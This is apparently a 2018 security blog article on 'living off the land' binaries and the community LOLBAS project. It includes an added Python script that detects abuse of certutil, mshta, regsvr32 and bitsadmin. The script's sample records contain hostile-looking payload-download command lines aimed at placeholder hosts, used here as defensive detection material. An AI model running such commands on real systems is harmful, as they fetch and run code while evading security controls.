Threats 101
David Bisson
May 2018

LOLBins: Attackers Are Abusing Trusted Binaries to Target Organizations


Photo by Savvas Stavrinos

Researchers have set out to build a list of LOLBins, legitimate programs attackers are abusing to bypass security and evade detection.

Trust is one of the key pillars information security is built on. It’s ultimately what determines who has access to what, which applications are allowed to run and which aren’t. But what happens when trust is abused? For example, when authorized, trusted applications are used by bad actors?

That theoretical issue has become a very real problem, with attackers increasingly seeking out legitimate programs they can abuse to carry out malicious activities. Their goal is to blend into typical system activity to avoid raising red flags and give themselves more time to move laterally in the network, conduct espionage, and steal data. Dubbed “living off the land,” it’s a tactic that has experienced explosive growth, with one report estimating that 52% of attacks in 2017 involved the abuse of two legitimate programs — PowerShell or Windows Management Instrumentation (WMI) — in particular.

PowerShell and WMI are far from the only trusted applications with the potential for abuse, however. Recently, researchers have begun building a list of these applications, categorizing them under the name “LOLBins.”

Living off the land with LOLBins

LOLBins are a good example of bad actors' exploitation of trust. Short for "living-off-the-land binaries," they are trusted binaries that an attacker can use to perform actions other than those for which they were originally intended. As such, LOLBins make it possible for attackers to bypass defensive countermeasures such as application whitelisting, security monitoring, and antivirus software with a reduced chance of being detected.

The notion behind LOLBins isn't new. Security researcher and veteran Black Hat trainer Matt Graeber first came up with "living off the land" during a presentation at DerbyCon 3.0. A video of this talk can be found below:


Even so, the term "LOLBins" is new. It was first proposed on Twitter during a discussion of what these types of files should be called.

After Graeber lent his support to the term, security researcher Oddvar Moe ran a poll to see if the community could agree on "LOLBins" as a standardized term. The results came back positive, so Moe decided to combine his existing notes on LOLBins with his list of Ultimate AppLocker Bypasses into a new list for LOLBins and LOLScripts to benefit the infosec community. This resulted in the LOLBAS (short for "Living Off the Land Binaries and Scripts") project.

Currently, there are over 80 LOLBins listed, ranging from Microsoft’s legitimate data-transfer tool Bitsadmin.exe to print.exe. The list includes programs that have documented potential for abuse as well as a variety of programs that have already become favorite tools for retrieving malware payloads during real-world attacks, including mshta.exe, certutil.exe, and regsvr32.exe.
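The practical consequence of the list above is that a defender cannot block these binaries outright (they are signed, shipped with Windows and used legitimately), so detection has to look at how they are invoked. The script below is an added example written for this article, not code from the LOLBAS project or the author: it scans a handful of constructed process-creation records and flags executions of certutil.exe, mshta.exe, regsvr32.exe and bitsadmin.exe that reference a remote URL or are launched by an Office application. The flat `Key=Value | Key=Value` record layout, the suspicious-parent policy, the `example.invalid` hosts and the sample command lines are all assumptions made for the example; a real deployment would read Sysmon or EDR process-creation events and tune the parent list to the environment.

```python
import re
from dataclasses import dataclass, field

# Binaries the article names as favourite payload-retrieval tools, plus
# bitsadmin.exe, which it mentions as Microsoft's data-transfer tool.
WATCHED_LOLBINS = {"certutil.exe", "mshta.exe", "regsvr32.exe", "bitsadmin.exe"}

# Parents from which a LOLBin launch is rarely legitimate. This is a
# hypothetical policy choice for the example; tune it to your environment.
SUSPICIOUS_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}

# Any remote URL on the command line of a watched binary is worth a look.
URL_RE = re.compile(r"\b(?:https?|ftp)://[^\s\"']+", re.IGNORECASE)


@dataclass
class Finding:
    record_id: int
    image: str
    parent: str
    reasons: list = field(default_factory=list)


def parse_event(line: str) -> dict:
    """Parse one 'Key=Value | Key=Value' record into a dict.

    The layout is a constructed flat rendering of a process-creation
    event, not the native Sysmon or EDR schema.
    """
    fields = {}
    for part in line.split(" | "):
        key, _, value = part.partition("=")
        fields[key.strip()] = value.strip()
    return fields


def basename(path: str) -> str:
    """Case-folded file name, tolerating either path separator."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def evaluate(event: dict):
    """Return a Finding when a watched LOLBin shows abuse indicators, else None."""
    image = basename(event.get("Image", ""))
    if image not in WATCHED_LOLBINS:
        return None
    parent = basename(event.get("ParentImage", ""))
    cmdline = event.get("CommandLine", "")
    reasons = []
    urls = URL_RE.findall(cmdline)
    if urls:
        reasons.append(f"remote URL in command line: {urls[0]}")
    if parent in SUSPICIOUS_PARENTS:
        reasons.append(f"launched by {parent}")
    if not reasons:
        return None
    return Finding(int(event.get("RecordId", "0")), image, parent, reasons)


def scan(lines) -> list:
    """Run evaluate() over every non-empty record and keep only the findings."""
    findings = []
    for line in lines:
        if line.strip():
            finding = evaluate(parse_event(line))
            if finding:
                findings.append(finding)
    return findings


# Constructed sample records (not real telemetry). Records 1, 4 and 5 are
# benign uses; 2, 3 and 6 carry the indicators the detector looks for.
SAMPLE_EVENTS = [
    r"RecordId=1 | Image=C:\Windows\System32\certutil.exe | ParentImage=C:\Windows\System32\cmd.exe | CommandLine=certutil.exe -verify C:\Temp\vendor.cer",
    r"RecordId=2 | Image=C:\Windows\System32\certutil.exe | ParentImage=C:\Program Files\Microsoft Office\WINWORD.EXE | CommandLine=certutil.exe -urlcache http://example.invalid/update.dat",
    r"RecordId=3 | Image=C:\Windows\System32\mshta.exe | ParentImage=C:\Windows\explorer.exe | CommandLine=mshta.exe http://example.invalid/index.hta",
    r'RecordId=4 | Image=C:\Windows\System32\regsvr32.exe | ParentImage=C:\Windows\System32\msiexec.exe | CommandLine=regsvr32.exe /s "C:\Program Files\Vendor\lib.dll"',
    r"RecordId=5 | Image=C:\Windows\System32\notepad.exe | ParentImage=C:\Windows\explorer.exe | CommandLine=notepad.exe C:\Temp\notes.txt",
    r"RecordId=6 | Image=C:\Windows\System32\bitsadmin.exe | ParentImage=C:\Windows\System32\cmd.exe | CommandLine=bitsadmin.exe /transfer job /download https://updates.example.invalid/pkg.msi C:\Temp\pkg.msi",
]


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"record {f.record_id}: {f.image} (parent {f.parent}) -> {'; '.join(f.reasons)}")
```

Record 6 shows why this stays a triage aid rather than a blocking rule: bitsadmin fetching an installer from an update server looks identical to a payload download, so a production version needs an allowlist of expected parents, users or destination hosts on top of the URL check. Record 2 is the high-confidence case, where both indicators fire at once.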


Raising Awareness for LOLBins with the LOLBAS Project


“The point of this project is to highlight that we choose to trust signed binaries and scripts from big vendors without thinking they can be used by attackers to perform further attacks.”

Oddvar Moe, security researcher and Chief Technical Architect at Advania Norway

Moe believes that LOLBAS is responsible for helping to ignite greater interest in LOLBins. 

"Having good documentation on these binaries and scripts can help everyone prevent attacks by actively blocking their execution," Moe told this author. "If you know something can be used for evil, it makes the job so much easier when looking for attacks and trying to prevent them. Advanced persistent threat (APT) actors are already using these binaries/scripts as part of their attacks, after all. Therefore, we need to dig into all the files and figure out smart ways we can use this list before the attackers do."

LOLBAS functions as a dynamic list maintained by the infosec community. Anyone who researches and finds new LOLBins is encouraged to submit them and will be acknowledged for it. The current list is just the beginning, too. Moe said he hopes to eventually provide a searchable list in a database format for the service, map it to the MITRE ATT&CK framework, and add more data to each LOLBin and LOLScript record, including information on detection and relevant blocking techniques.

Security professional and active LOLBins contributor Pierre-Alexandre Braeken feels these planned changes illustrate the importance of LOLBAS and, by extension, just how great a threat the abuse of trust poses to organizations.

"People should care about living-off-the-land techniques because if they do not, they could be blind when the next attack targeting their company happens," Braeken clarified in an email. "Traditional antivirus or even endpoint detection and response (EDR) products won't always be able to detect this kind of attack. And if they do but the analysts are not aware of this, they could miss a threat happening in their network."

How You Can Get Involved

Those who know of a specific file that can be abused in attack scenarios can reach out to Moe directly @oddvarmoe or open a pull request against the LOLBAS GitHub project. They can also tweet it out with #LOLBin #LOLScript #LOLLib, and it will get picked up eventually.

Not having specific new examples shouldn't stop people, either. There are still many ways that people can contribute to the LOLBins cause. 

"Everybody can help. If you are new to this, don't be shy," Braeken stated. "Everybody has to start somewhere. If you are already involved with this project, please help welcome other people into the fold. If you have ideas to contribute, pick one. Say hi. Overall, do something that makes the project better."

More information on the LOLBins project can be found on GitHub here.

David Bisson

David Bisson is an infosec news junkie and security journalist. He works as Senior Content Manager, Associate Editor for Tripwire's "The State of Security" blog, Contributing Editor for IBM's Security Intelligence, and Contributing Writer for Barkly, Palo Alto Networks' Security Roundtable, Gemalto, Venafi, Zix Corp, AlienVault, and others.
